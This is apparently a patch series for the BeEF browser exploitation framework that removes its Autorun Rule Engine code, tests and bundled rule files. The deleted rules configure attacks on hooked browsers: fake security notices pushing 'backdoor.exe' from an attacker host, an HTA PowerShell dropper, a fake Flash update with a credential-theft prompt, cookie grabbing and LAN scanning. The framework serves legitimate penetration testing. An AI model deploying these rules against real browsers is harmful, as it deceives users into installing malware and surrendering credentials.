initialize - @config = BeEF::Core::Configuration.instance - @debug_on = @config.get('beef.debug') - end - - # Load an ARE rule set - # @param [Hash] ARE ruleset as JSON - # @return [Hash] {"success": Boolean, "rule_id": Integer, "error": String} - def load_rule_json(data) - name = data['name'] || '' - author = data['author'] || '' - browser = data['browser'] || 'ALL' - browser_version = data['browser_version'] || 'ALL' - os = data['os'] || 'ALL' - os_version = data['os_version'] || 'ALL' - modules = data['modules'] - execution_order = data['execution_order'] - execution_delay = data['execution_delay'] - chain_mode = data['chain_mode'] || 'sequential' - - begin - BeEF::Core::AutorunEngine::Parser.instance.parse( - name, - author, - browser, - browser_version, - os, - os_version, - modules, - execution_order, - execution_delay, - chain_mode - ) - rescue => e - print_error("[ARE] Error loading ruleset (#{name}): #{e.message}") - return { 'success' => false, 'error' => e.message } - end - - existing_rule = BeEF::Core::Models::Rule.where( - name: name, - author: author, - browser: browser, - browser_version: browser_version, - os: os, - os_version: os_version, - modules: modules.to_json, - execution_order: execution_order.to_s, - execution_delay: execution_delay.to_s, - chain_mode: chain_mode - ).first - - unless existing_rule.nil? - msg = "Duplicate rule already exists in the database (ID: #{existing_rule.id})" - print_info("[ARE] Skipping ruleset (#{name}): #{msg}") - return { 'success' => false, 'error' => msg } - end - - are_rule = BeEF::Core::Models::Rule.new( - name: name, - author: author, - browser: browser, - browser_version: browser_version, - os: os, - os_version: os_version, - modules: modules.to_json, - execution_order: execution_order.to_s, - execution_delay: execution_delay.to_s, - chain_mode: chain_mode - ) - are_rule.save - - print_info("[ARE] Ruleset (#{name}) parsed and stored successfully.") - - if @debug_on - print_more "Target Browser: #{browser} (#{browser_version})" - print_more "Target OS: #{os} (#{os_version})" - print_more 'Modules to run:' - modules.each do |mod| - print_more "(*) Name: #{mod['name']}" - print_more "(*) Condition: #{mod['condition']}" - print_more "(*) Code: #{mod['code']}" - print_more '(*) Options:' - mod['options'].each do |key, value| - print_more "\t#{key}: (#{value})" - end - end - print_more "Exec order: #{execution_order}" - print_more "Exec delay: #{exec_delay}" - end - - { 'success' => true, 'rule_id' => are_rule.id } - rescue TypeError, ArgumentError => e - print_error("[ARE] Failed to load ruleset (#{name}): #{e.message}") - { 'success' => false, 'error' => e.message } - end - - # Update an ARE rule set. - # @param [Hash] ARE rule ID. - # @param [Hash] ARE ruleset as JSON - # @return [Hash] {"success": Boolean, "rule_id": Integer, "error": String} - def update_rule_json(id, data) - # Quite similar in implementation to load_rule_json. Might benefit from a refactor. - name = data['name'] || '' - author = data['author'] || '' - browser = data['browser'] || 'ALL' - browser_version = data['browser_version'] || 'ALL' - os = data['os'] || 'ALL' - os_version = data['os_version'] || 'ALL' - modules = data['modules'] - execution_order = data['execution_order'] - execution_delay = data['execution_delay'] - chain_mode = data['chain_mode'] || 'sequential' - - begin - BeEF::Core::AutorunEngine::Parser.instance.parse( - name, - author, - browser, - browser_version, - os, - os_version, - modules, - execution_order, - execution_delay, - chain_mode - ) - rescue => e - print_error("[ARE] Error updating ruleset (#{name}): #{e.message}") - return { 'success' => false, 'error' => e.message } - end - - existing_rule = BeEF::Core::Models::Rule.where( - name: name, - author: author, - browser: browser, - browser_version: browser_version, - os: os, - os_version: os_version, - modules: modules.to_json, - execution_order: execution_order.to_s, - execution_delay: execution_delay.to_s, - chain_mode: chain_mode - ).first - - unless existing_rule.nil? - msg = "Duplicate rule already exists in the database (ID: #{existing_rule.id})" - print_info("[ARE] Skipping ruleset (#{name}): #{msg}") - return { 'success' => false, 'error' => msg } - end - old_are_rule = BeEF::Core::Models::Rule.find_by(id: id) - - old_are_rule.update( - name: name, - author: author, - browser: browser, - browser_version: browser_version, - os: os, - os_version: os_version, - modules: modules.to_json, - execution_order: execution_order.to_s, - execution_delay: execution_delay.to_s, - chain_mode: chain_mode - ) - - print_info("[ARE] Ruleset (#{name}) updated successfully.") - - if @debug_on - print_more "Target Browser: #{browser} (#{browser_version})" - print_more "Target OS: #{os} (#{os_version})" - print_more 'Modules to run:' - modules.each do |mod| - print_more "(*) Name: #{mod['name']}" - print_more "(*) Condition: #{mod['condition']}" - print_more "(*) Code: #{mod['code']}" - print_more '(*) Options:' - mod['options'].each do |key, value| - print_more "\t#{key}: (#{value})" - end - end - print_more "Exec order: #{execution_order}" - print_more "Exec delay: #{exec_delay}" - end - - { 'success' => true } - rescue TypeError, ArgumentError => e - print_error("[ARE] Failed to update ruleset (#{name}): #{e.message}") - { 'success' => false, 'error' => e.message } - end - - # Load an ARE ruleset from file - # @param [String] JSON ARE ruleset file path - def load_rule_file(json_rule_path) - rule_file = File.open(json_rule_path, 'r:UTF-8', &:read) - self.load_rule_json(JSON.parse(rule_file)) - rescue => e - print_error("[ARE] Failed to load ruleset from #{json_rule_path}: #{e.message}") - end - - # Load all JSON ARE rule files from arerules/enabled/ directory - def load_directory - Dir.glob("#{$root_dir}/arerules/enabled/**/*.json") do |rule_file| - print_debug("[ARE] Processing ruleset file: #{rule_file}") - load_rule_file(rule_file) - end - end - end - end - end -end diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb index 3d02f22253..4d75411b23 100644 --- a/core/main/handlers/browserdetails.rb +++ b/core/main/handlers/browserdetails.rb @@ -557,10 +557,6 @@ def setup BeEF::Core::Models::NetworkHost.create(hooked_browser_id: session_id, ip: '127.0.0.1', hostname: 'localhost', os: BeEF::Core::Models::BrowserDetails.get(session_id, 'host.os.name')) end - - # check if any ARE rules shall be triggered only if the channel is != WebSockets (XHR). If the channel - # is WebSockets, then ARe rules are triggered after channel is established. - BeEF::Core::AutorunEngine::Engine.instance.find_and_run_all_matching_rules_for_zombie(zombie.id) unless config.get('beef.http.websocket.enable') end def get_param(query, key) diff --git a/core/main/models/execution.rb b/core/main/models/execution.rb deleted file mode 100644 index 1991047950..0000000000 --- a/core/main/models/execution.rb +++ /dev/null @@ -1,14 +0,0 @@ -# -# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net -# Browser Exploitation Framework (BeEF) - https://beefproject.com -# See the file 'doc/COPYING' for copying permission -# - -module BeEF - module Core - module Models # @note Stored info about the execution of the ARE on hooked browsers. - class Execution < BeEF::Core::Model - end - end - end -end diff --git a/core/main/models/rule.rb b/core/main/models/rule.rb deleted file mode 100644 index e56bb4d2a7..0000000000 --- a/core/main/models/rule.rb +++ /dev/null @@ -1,16 +0,0 @@ -# -# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net -# Browser Exploitation Framework (BeEF) - https://beefproject.com -# See the file 'doc/COPYING' for copying permission -# - -module BeEF - module Core - module Models - # @note Table stores the rules for the Distributed Engine. - class Rule < BeEF::Core::Model - has_many :executions - end - end - end -end diff --git a/core/main/network_stack/websocket/websocket.rb b/core/main/network_stack/websocket/websocket.rb index b0399532a1..3ccea20aa4 100644 --- a/core/main/network_stack/websocket/websocket.rb +++ b/core/main/network_stack/websocket/websocket.rb @@ -108,12 +108,9 @@ def start_websocket_server(ws_options) hooked_browser = BeEF::Core::Models::HookedBrowser.where(session: hb_session).first if hooked_browser.nil? print_error '[WebSocket] Fingerprinting not finished yet.' - print_more 'ARE rules were not triggered. You may want to trigger them manually via REST API.' next end - BeEF::Core::AutorunEngine::Engine.instance.find_and_run_all_matching_rules_for_zombie(hooked_browser.id) - next end @@ -140,15 +137,6 @@ def start_websocket_server(ws_options) zombie_commands = BeEF::Core::Models::Command.where(hooked_browser_id: hooked_browser.id, instructions_sent: false) zombie_commands.each { |command| add_command_instructions(command, hooked_browser) } - # Check if there are any ARE rules to be triggered. If is_sent=false rules are triggered - are_body = '' - are_executions = BeEF::Core::Models::Execution.where(is_sent: false, session_id: hooked_browser.session) - are_executions.each do |are_exec| - are_body += are_exec.mod_body - are_exec.update(is_sent: true, exec_time: Time.new.to_i) - end - @@activeSocket[hooked_browser.session].send(are_body) unless are_body.empty? - # @todo antisnatchor: # @todo - re-use the pre_hook_send callback mechanisms to have a generic check for multipl extensions # Check if new forged requests need to be sent (Requester/TunnelingProxy) diff --git a/core/main/rest/handlers/autorun_engine.rb b/core/main/rest/handlers/autorun_engine.rb deleted file mode 100644 index c2e311067e..0000000000 --- a/core/main/rest/handlers/autorun_engine.rb +++ /dev/null @@ -1,157 +0,0 @@ -# -# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net -# Browser Exploitation Framework (BeEF) - https://beefproject.com -# See the file 'doc/COPYING' for copying permission -# - -module BeEF - module Core - module Rest - class AutorunEngine < BeEF::Core::Router::Router - config = BeEF::Core::Configuration.instance - - before do - error 401 unless params[:token] == config.get('beef.api_token') - halt 401 unless BeEF::Core::Rest.permitted_source?(request.ip) - headers 'Content-Type' => 'application/json; charset=UTF-8', - 'Pragma' => 'no-cache', - 'Cache-Control' => 'no-cache', - 'Expires' => '0' - end - - # - # Get all rules - # - get '/rules' do - rules = BeEF::Core::Models::Rule.all - { - 'success' => true, - 'count' => rules.length, - 'rules' => rules.to_json - }.to_json - rescue StandardError => e - print_error("Internal error while retrieving Autorun rules: #{e.message}") - halt 500 - end - - # Returns a specific rule by ID - get '/rule/:rule_id' do - rule_id = params[:rule_id] - - rule = BeEF::Core::Models::Rule.find(rule_id) - raise InvalidParameterError, 'id' if rule.nil? - - halt 404 if rule.empty? - - rule.to_json - rescue InvalidParameterError => e - print_error e.message - halt 400 - rescue StandardError => e - print_error "Internal error while retrieving Autorun rule with id #{rule_id} (#{e.message})" - halt 500 - end - - # - # Add a new ruleset. Return the rule_id if request was successful. - # @return [Integer] rule ID - # - post '/rule/add' do - request.body.rewind - data = JSON.parse request.body.read - rloader = BeEF::Core::AutorunEngine::RuleLoader.instance - rloader.load_rule_json(data).to_json - rescue StandardError => e - print_error "Internal error while adding Autorun rule: #{e.message}" - { 'success' => false, 'error' => e.message }.to_json - end - - # - # Delete a ruleset - # - delete '/rule/:rule_id' do - rule_id = params[:rule_id] - rule = BeEF::Core::Models::Rule.find(rule_id) - raise InvalidParameterError, 'id' if rule.nil? - rule.destroy - - { 'success' => true }.to_json - rescue InvalidParameterError => e - print_error e.message - halt 400 - rescue StandardError => e - print_error "Internal error while deleting Autorun rule: #{e.message}" - { 'success' => false, 'error' => e.message }.to_json - end - - # - # Update a ruleset - # - patch '/rule/:rule_id' do - rule_id = params[:rule_id] - rule = BeEF::Core::Models::Rule.find(rule_id) - raise InvalidParameterError, 'id' if rule.nil? - data = JSON.parse request.body.read - rloader = BeEF::Core::AutorunEngine::RuleLoader.instance - rloader.update_rule_json(rule_id, data) - - { 'success' => true }.to_json - rescue InvalidParameterError => e - print_error e.message - halt 400 - rescue StandardError => e - print_error "Internal error while updating Autorun rule: #{e.message}" - { 'success' => false, 'error' => e.message }.to_json - end - - # - # Run a specified rule on all online hooked browsers (if the zombie matches the rule). - # Offline hooked browsers are ignored - # - get '/run/:rule_id' do - rule_id = params[:rule_id] - - online_hooks = BeEF::Core::Models::HookedBrowser.where('lastseen >= ?', (Time.new.to_i - 15)) - - if online_hooks.nil? - return { 'success' => false, 'error' => 'There are currently no hooked browsers online.' }.to_json - end - - are = BeEF::Core::AutorunEngine::Engine.instance - online_hooks.each do |hb| - are.run_matching_rules_on_zombie(rule_id, hb.id) - end - - { 'success' => true }.to_json - rescue StandardError => e - msg = "Could not trigger rules: #{e.message}" - print_error "[ARE] #{msg}" - { 'success' => false, 'error' => msg }.to_json - end - - # - # Run a specified rule on the specified hooked browser. - # - get '/run/:rule_id/:hb_id' do - rule_id = params[:rule_id] - hb_id = params[:hb_id] - - raise InvalidParameterError, 'rule_id' if rule_id.nil? - raise InvalidParameterError, 'hb_id' if hb_id.nil? - - are = BeEF::Core::AutorunEngine::Engine.instance - are.run_matching_rules_on_zombie(rule_id, hb_id) - - { 'success' => true }.to_json - rescue InvalidParameterError => e - print_error e.message - halt 400 - rescue StandardError => e - msg = "Could not trigger rule: #{e.message}" - print_error "[ARE] #{msg}" - { 'success' => false, 'error' => msg }.to_json - end - end - end - end -end diff --git a/spec/beef/core/main/autorun_engine/autorun_engine_spec.rb b/spec/beef/core/main/autorun_engine/autorun_engine_spec.rb deleted file mode 100644 index dfe287d0bb..0000000000 --- a/spec/beef/core/main/autorun_engine/autorun_engine_spec.rb +++ /dev/null @@ -1,120 +0,0 @@ -# -# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net -# Browser Exploitation Framework (BeEF) - https://beefproject.com -# See the file 'doc/COPYING' for copying permission -# - -require 'rest-client' -require 'json' -require_relative '../../../../spec_helper' -require_relative '../../../../support/constants' -require_relative '../../../../support/beef_test' - -RSpec.describe 'AutoRunEngine Test', run_on_browserstack: true do - before(:all) do - @__ar_config_snapshot = SpecActiveRecordConnection.snapshot - @config = BeEF::Core::Configuration.instance - - # Grab DB file and regenerate if requested - print_info 'Loading database' - db_file = @config.get('beef.database.file') - print_info 'Resetting the database for BeEF.' - - if ENV['RESET_DB'] - File.delete(db_file) if File.exist?(db_file) - end - - @config.set('beef.credentials.user', 'beef') - @config.set('beef.credentials.passwd', 'beef') - @username = @config.get('beef.credentials.user') - @password = @config.get('beef.credentials.passwd') - - # Load BeEF extensions and modules - # Always load Extensions, as previous changes to the config from other tests may affect - # whether or not this test passes. - print_info 'Loading in BeEF::Extensions' - BeEF::Extensions.load - - # Check if modules already loaded. No need to reload. - if @config.get('beef.module').nil? - print_info 'Loading in BeEF::Modules' - BeEF::Modules.load - else - print_info 'Modules already loaded' - end - - - # Load up DB and migrate if necessary - ActiveRecord::Base.logger = nil - OTR::ActiveRecord.configure_from_hash!(adapter: 'sqlite3', database: db_file) - # otr-activerecord require you to manually establish the connection with the following line - #Also a check to confirm that the correct Gem version is installed to require it, likely easier for old systems. - if Gem.loaded_specs['otr-activerecord'].version > Gem::Version.create('1.4.2') - OTR::ActiveRecord.establish_connection! - end - ActiveRecord::Migrator.migrations_paths = [File.join('core', 'main', 'ar-migrations')] - MUTEX.synchronize do - context = ActiveRecord::MigrationContext.new(ActiveRecord::Migrator.migrations_paths) - if context.needs_migration? - ActiveRecord::Migrator.new(:up, context.migrations, context.schema_migration, context.internal_metadata).migrate - end - end - - BeEF::Core::Migration.instance.update_db! - - # add AutoRunEngine rule - test_rule = { 'name' => 'Display an alert', 'author' => 'mgeeky', 'browser' => 'ALL', 'browser_version' => 'ALL', 'os' => 'ALL', 'os_version' => 'ALL', 'modules' => [{ 'name' => 'alert_dialog', 'condition' => nil, 'options' => { 'text' => "You've been BeEFed ;>" } }], 'execution_order' => [0], 'execution_delay' => [0], 'chain_mode' => 'sequential' } - - BeEF::Core::AutorunEngine::RuleLoader.instance.load_directory - # are_engine.R - - # Spawn HTTP Server - print_info 'Starting HTTP Hook Server' - http_hook_server = BeEF::Core::Server.instance - - # Generate a token for the server to respond with - @token = BeEF::Core::Crypto.api_token - - # ***** IMPORTANT: close any and all AR/OTR connections before forking ***** - disconnect_all_active_record! - - # Initiate server start-up - @pid = fork do - http_hook_server.prepare - BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server) - http_hook_server.start - end - - begin - @caps = CONFIG['common_caps'].merge(CONFIG['browser_caps'][TASK_ID]) - @caps['name'] = self.class.description || ENV['name'] || 'no-name' - @caps['browserstack.local'] = true - @caps['browserstack.localIdentifier'] = ENV['BROWSERSTACK_LOCAL_IDENTIFIER'] - - @driver = Selenium::WebDriver.for(:remote, - url: "http://#{CONFIG['user']}:#{CONFIG['key']}@#{CONFIG['server']}/wd/hub", - options: @caps) - # Hook new victim - print_info 'Hooking a new victim, waiting a few seconds...' - wait = Selenium::WebDriver::Wait.new(timeout: 30) # seconds - - @driver.navigate.to VICTIM_URL.to_s - - sleep 1 - - sleep 1 until wait.until { @driver.execute_script('return window.beef.session.get_hook_session_id().length') > 0 } - - @session = @driver.execute_script('return window.beef.session.get_hook_session_id()') - end - end - - after(:all) do - server_teardown(@driver, @pid, @pids) - disconnect_all_active_record! - SpecActiveRecordConnection.restore!(@__ar_config_snapshot) - end - - it 'AutoRunEngine is working' do - expect(@session).not_to be_nil - end -end From de30c65d7e332b91d17c92a495b08279d6155053 Mon Sep 17 00:00:00 2001 From: kaitoozawa <kaitozaw@gmail.com> Date: Sat, 27 Dec 2025 16:18:50 +1000 Subject: [PATCH 5/9] Revert credential changes for config.yaml --- config.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/config.yaml b/config.yaml index 5500d2f518..d054bd66f8 100644 --- a/config.yaml +++ b/config.yaml @@ -17,8 +17,8 @@ beef: # Credentials to authenticate in BeEF. # Used by both the RESTful API and the Admin interface credentials: - user: "kaitoozawa" - passwd: "brisbane" + user: "beef" + passwd: "beef" # Interface / IP restrictions restrictions: From a9de1fad61e7b801108881465669f62cea51f540 Mon Sep 17 00:00:00 2001 From: kaitoozawa <kaitozaw@gmail.com> Date: Sat, 27 Dec 2025 16:42:36 +1000 Subject: [PATCH 6/9] Phase 5: Remove Configuration and Assets --- arerules/alert.json | 14 -------- arerules/c_osx_test-return-mods.json | 35 ------------------- arerules/confirm_close_tab.json | 16 --------- arerules/enabled/README | 2 -- arerules/ff_osx_extension-dropper.json | 19 ---------- arerules/get_cookie.json | 14 -------- arerules/ie_win_fakenotification-clippy.json | 31 ---------------- arerules/ie_win_htapowershell.json | 26 -------------- arerules/ie_win_missingflash-prettytheft.json | 27 -------------- arerules/ie_win_test-return-mods.json | 35 ------------------- arerules/lan_cors_scan.json | 25 ------------- arerules/lan_cors_scan_common.json | 19 ---------- arerules/lan_fingerprint.json | 25 ------------- arerules/lan_fingerprint_common.json | 19 ---------- arerules/lan_flash_scan.json | 24 ------------- arerules/lan_flash_scan_common.json | 19 ---------- arerules/lan_http_scan.json | 25 ------------- arerules/lan_http_scan_common.json | 19 ---------- arerules/lan_ping_sweep.json | 22 ------------ arerules/lan_ping_sweep_common.json | 17 --------- arerules/lan_port_scan.json | 25 ------------- arerules/lan_sw_port_scan.json | 21 ----------- arerules/man_in_the_browser.json | 13 ------- arerules/raw_javascript.json | 15 -------- arerules/record_snapshots.json | 15 -------- arerules/win_fake_malware.json | 35 ------------------- config.yaml | 13 ------- core/main/handlers/hookedbrowsers.rb | 7 ---- core/main/rest/api.rb | 7 ---- 29 files changed, 584 deletions(-) delete mode 100644 arerules/alert.json delete mode 100644 arerules/c_osx_test-return-mods.json delete mode 100644 arerules/confirm_close_tab.json delete mode 100644 arerules/enabled/README delete mode 100644 arerules/ff_osx_extension-dropper.json delete mode 100644 arerules/get_cookie.json delete mode 100644 arerules/ie_win_fakenotification-clippy.json delete mode 100644 arerules/ie_win_htapowershell.json delete mode 100644 arerules/ie_win_missingflash-prettytheft.json delete mode 100644 arerules/ie_win_test-return-mods.json delete mode 100644 arerules/lan_cors_scan.json delete mode 100644 arerules/lan_cors_scan_common.json delete mode 100644 arerules/lan_fingerprint.json delete mode 100644 arerules/lan_fingerprint_common.json delete mode 100644 arerules/lan_flash_scan.json delete mode 100644 arerules/lan_flash_scan_common.json delete mode 100644 arerules/lan_http_scan.json delete mode 100644 arerules/lan_http_scan_common.json delete mode 100644 arerules/lan_ping_sweep.json delete mode 100644 arerules/lan_ping_sweep_common.json delete mode 100644 arerules/lan_port_scan.json delete mode 100644 arerules/lan_sw_port_scan.json delete mode 100644 arerules/man_in_the_browser.json delete mode 100644 arerules/raw_javascript.json delete mode 100644 arerules/record_snapshots.json delete mode 100644 arerules/win_fake_malware.json diff --git a/arerules/alert.json b/arerules/alert.json deleted file mode 100644 index 0f6e537db5..0000000000 --- a/arerules/alert.json +++ /dev/null @@ -1,14 +0,0 @@ -{"name": "Display an alert", - "author": "mgeeky", - "modules": [ - {"name": "alert_dialog", - "condition": null, - "options": { - "text":"You've been BeEFed ;>" - } - } - ], - "execution_order": [0], - "execution_delay": [0], - "chain_mode": "sequential" -} diff --git a/arerules/c_osx_test-return-mods.json b/arerules/c_osx_test-return-mods.json deleted file mode 100644 index 684d05c6fd..0000000000 --- a/arerules/c_osx_test-return-mods.json +++ /dev/null @@ -1,35 +0,0 @@ -{ - "name": "Test return debug stuff", - "author": "antisnatchor", - "browser": "S", - "browser_version": ">= 7", - "os": "OSX", - "os_version": "<= 10.10", - "modules": [{ - "name": "test_return_ascii_chars", - "condition": null, - "options": {} - }, { - "name": "test_return_long_string", - "condition": "status==1", - "code": "var mod_input=test_return_ascii_chars_mod_output + '--(CICCIO)--';", - "options": { - "repeat": "10", - "repeat_string": "<<mod_input>>" - } - }, - { - "name": "alert_dialog", - "condition": "status=1", - "code": "var mod_input=test_return_long_string_mod_output + '--(PASTICCIO)--';", - "options":{"text":"<<mod_input>>"} - }, - { - "name": "get_page_html", - "condition": null, - "options": {} - }], - "execution_order": [0, 1, 2, 3], - "execution_delay": [0, 0, 0, 0], - "chain_mode": "nested-forward" -} \ No newline at end of file diff --git a/arerules/confirm_close_tab.json b/arerules/confirm_close_tab.json deleted file mode 100644 index c3a4a65a7d..0000000000 --- a/arerules/confirm_close_tab.json +++ /dev/null @@ -1,16 +0,0 @@ -{"name": "Confirm Close Tab", - "author": "mgeeky", - "modules": [ - {"name": "confirm_close_tab", - "condition": null, - "code": null, - "options": { - "text":"Are you sure you want to navigate away from this page?", - "usePopUnder":"true" - } - } - ], - "execution_order": [0], - "execution_delay": [0], - "chain_mode": "sequential" -} diff --git a/arerules/enabled/README b/arerules/enabled/README deleted file mode 100644 index dee3c03d29..0000000000 --- a/arerules/enabled/README +++ /dev/null @@ -1,2 +0,0 @@ -Move here the ARE rule files that you want to pre-load when BeEF starts. -Make sure they are .json files (any other file extension is ignored). \ No newline at end of file diff --git a/arerules/ff_osx_extension-dropper.json b/arerules/ff_osx_extension-dropper.json deleted file mode 100644 index 4c6b388af7..0000000000 --- a/arerules/ff_osx_extension-dropper.json +++ /dev/null @@ -1,19 +0,0 @@ -{ - "name": "Firefox Extension Dropper", - "author": "antisnatchor", - "browser": "FF", - "os": "OSX", - "os_version": ">= 10.8", - "modules": [{ - "name": "firefox_extension_dropper", - "condition": null, - "options": { - "extension_name": "Ummeneske", - "xpi_name": "Ummeneske", - "base_host": "http://172.16.45.1:3000" - } - }], - "execution_order": [0], - "execution_delay": [0], - "chain_mode": "sequential" -} diff --git a/arerules/get_cookie.json b/arerules/get_cookie.json deleted file mode 100644 index 42e7cf4334..0000000000 --- a/arerules/get_cookie.json +++ /dev/null @@ -1,14 +0,0 @@ -{ - "name": "Get Cookie", - "author": "@benichmt1", - "modules": [ - {"name": "get_cookie", - "condition": null, - "options": { - } - } - ], - "execution_order": [0], - "execution_delay": [0], - "chain_mode": "sequential" -} diff --git a/arerules/ie_win_fakenotification-clippy.json b/arerules/ie_win_fakenotification-clippy.json deleted file mode 100644 index 22f8cbbdc6..0000000000 --- a/arerules/ie_win_fakenotification-clippy.json +++ /dev/null @@ -1,31 +0,0 @@ -{ - "name": "Ie Fake Notification + Clippy", - "author": "antisnatchor", - "browser": "IE", - "browser_version": "== 11", - "os": "Windows", - "os_version": ">= 7", - "modules": [ - { - "name": "fake_notification", - "condition": null, - "options": { - "notification_text":"Internet Explorer SECURITY NOTIFICATION: your browser is outdated and vulnerable to critical security vulnerabilities like CVE-2015-009 and CVE-2014-879. Please update it." - } - } - ,{ - "name": "clippy", - "condition": null, - "options": { - "clippydir": "http://172.16.45.1:3000/clippy/", - "askusertext": "Your browser appears to be out of date. Would you like to upgrade it?", - "executeyes": "http://172.16.45.1:3000/updates/backdoor.exe", - "respawntime":"5000", - "thankyoumessage":"Thanks for upgrading your browser! Look forward to a safer, faster web!" - } - } - ], - "execution_order": [0,1], - "execution_delay": [0,2000], - "chain_mode": "sequential" -} diff --git a/arerules/ie_win_htapowershell.json b/arerules/ie_win_htapowershell.json deleted file mode 100644 index d0c4776989..0000000000 --- a/arerules/ie_win_htapowershell.json +++ /dev/null @@ -1,26 +0,0 @@ -{ - "name": "HTA PowerShell", - "author": "antisnatchor", - "browser": "IE", - "os": "Windows", - "os_version": ">= 7", - "modules": [ - { - "name": "fake_notification", - "condition": null, - "options": { - "notification_text":"Internet Explorer SECURITY NOTIFICATION: your browser is outdated and vulnerable to critical security vulnerabilities like CVE-2015-009 and CVE-2014-879. Please apply the Microsoft Update below:" - } - }, - { - "name": "hta_powershell", - "condition": null, - "options": { - "domain":"http://172.16.45.1:3000", - "ps_url":"/ps" - } - }], - "execution_order": [0,1], - "execution_delay": [0,500], - "chain_mode": "sequential" -} diff --git a/arerules/ie_win_missingflash-prettytheft.json b/arerules/ie_win_missingflash-prettytheft.json deleted file mode 100644 index e7620f677f..0000000000 --- a/arerules/ie_win_missingflash-prettytheft.json +++ /dev/null @@ -1,27 +0,0 @@ -{ - "name": "Fake missing plugin + Pretty Theft LinkedIn", - "author": "antisnatchor", - "browser": "IE", - "browser_version": ">= 8", - "os": "Windows", - "os_version": "== XP", - "modules": [{ - "name": "fake_notification_c", - "condition": null, - "options": { - "url": "http://172.16.45.1:3000/updates/backdoor.exe", - "notification_text": "The version of the Adobe Flash plugin is outdated and does not include the latest security updates. Please ignore the missing signature, we at Adobe are working on it. " - } - }, { - "name": "pretty_theft", - "condition": null, - "options": { - "choice": "Windows", - "backing": "Grey", - "imgsauce": "http://172.16.45.1:3000/ui/media/images/beef.png" - } - }], - "execution_order": [0, 1], - "execution_delay": [0, 5000], - "chain_mode": "sequential" -} \ No newline at end of file diff --git a/arerules/ie_win_test-return-mods.json b/arerules/ie_win_test-return-mods.json deleted file mode 100644 index 657bb2026c..0000000000 --- a/arerules/ie_win_test-return-mods.json +++ /dev/null @@ -1,35 +0,0 @@ -{ - "name": "Test return debug stuff", - "author": "antisnatchor", - "browser": "IE", - "browser_version": "<= 8", - "os": "Windows", - "os_version": ">= XP", - "modules": [{ - "name": "test_return_ascii_chars", - "condition": null, - "options": {} - }, { - "name": "test_return_long_string", - "condition": "status==1", - "code": "var mod_input=test_return_ascii_chars_mod_output + '--CICCIO--';", - "options": { - "repeat": "10", - "repeat_string": "<<mod_input>>" - } - }, - { - "name": "alert_dialog", - "condition": "status=1", - "code": "var mod_input=test_return_long_string_mod_output + '--PASTICCIO--';", - "options":{"text":"<<mod_input>>"} - }, - { - "name": "get_page_html", - "condition": null, - "options": {} - }], - "execution_order": [0, 1, 2, 3], - "execution_delay": [0, 0, 0, 0], - "chain_mode": "nested-forward" -} \ No newline at end of file diff --git a/arerules/lan_cors_scan.json b/arerules/lan_cors_scan.json deleted file mode 100644 index 2d75b561f9..0000000000 --- a/arerules/lan_cors_scan.json +++ /dev/null @@ -1,25 +0,0 @@ -{"name": "LAN CORS Scan", - "author": "bcoles", - "browser": ["FF", "C"], - "modules": [ - {"name": "get_internal_ip_webrtc", - "condition": null, - "code": null, - "options": {} - }, - {"name": "cross_origin_scanner_cors", - "condition": "status==1", - "code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.1'; var end = s[0]+'.'+s[1]+'.'+s[2]+'.255'; var mod_input = start+'-'+end;", - "options": { - "ipRange":"<<mod_input>>", - "ports":"80,8080", - "threads":"2", - "wait":"2", - "timeout":"10" - } - } - ], - "execution_order": [0, 1], - "execution_delay": [0, 0], - "chain_mode": "nested-forward" -} diff --git a/arerules/lan_cors_scan_common.json b/arerules/lan_cors_scan_common.json deleted file mode 100644 index 51f994e040..0000000000 --- a/arerules/lan_cors_scan_common.json +++ /dev/null @@ -1,19 +0,0 @@ -{"name": "LAN CORS Scan (Common IPs)", - "author": "bcoles", - "modules": [ - {"name": "cross_origin_scanner_cors", - "condition": null, - "code": null, - "options": { - "ipRange":"common", - "ports":"80,8080", - "threads":"2", - "wait":"2", - "timeout":"10" - } - } - ], - "execution_order": [0], - "execution_delay": [0], - "chain_mode": "sequential" -} diff --git a/arerules/lan_fingerprint.json b/arerules/lan_fingerprint.json deleted file mode 100644 index b9a6313a49..0000000000 --- a/arerules/lan_fingerprint.json +++ /dev/null @@ -1,25 +0,0 @@ -{"name": "LAN Fingerprint", - "author": "bcoles", - "browser": ["FF", "C"], - "modules": [ - {"name": "get_internal_ip_webrtc", - "condition": null, - "code": null, - "options": {} - }, - {"name": "internal_network_fingerprinting", - "condition": "status==1", - "code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.1'; var end = s[0]+'.'+s[1]+'.'+s[2]+'.255'; var mod_input = start+'-'+end;", - "options": { - "ipRange":"<<mod_input>>", - "ports":"80,8080", - "threads":"3", - "wait":"5", - "timeout":"10" - } - } - ], - "execution_order": [0, 1], - "execution_delay": [0, 0], - "chain_mode": "nested-forward" -} diff --git a/arerules/lan_fingerprint_common.json b/arerules/lan_fingerprint_common.json deleted file mode 100644 index 39d94d7f21..0000000000 --- a/arerules/lan_fingerprint_common.json +++ /dev/null @@ -1,19 +0,0 @@ -{"name": "LAN Fingerprint (Common IPs)", - "author": "antisnatchor", - "modules": [ - {"name": "internal_network_fingerprinting", - "condition": null, - "code": null, - "options": { - "ipRange":"common", - "ports":"80,8080", - "threads":"3", - "wait":"5", - "timeout":"10" - } - } - ], - "execution_order": [0], - "execution_delay": [0], - "chain_mode": "sequential" -} diff --git a/arerules/lan_flash_scan.json b/arerules/lan_flash_scan.json deleted file mode 100644 index 2cf38eb2ac..0000000000 --- a/arerules/lan_flash_scan.json +++ /dev/null @@ -1,24 +0,0 @@ -{"name": "LAN Flash Scan", - "author": "bcoles", - "browser": ["FF", "C"], - "modules": [ - {"name": "get_internal_ip_webrtc", - "condition": null, - "code": null, - "options": {} - }, - {"name": "cross_origin_scanner_flash", - "condition": "status==1", - "code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.1'; var end = s[0]+'.'+s[1]+'.'+s[2]+'.255'; var mod_input = start+'-'+end;", - 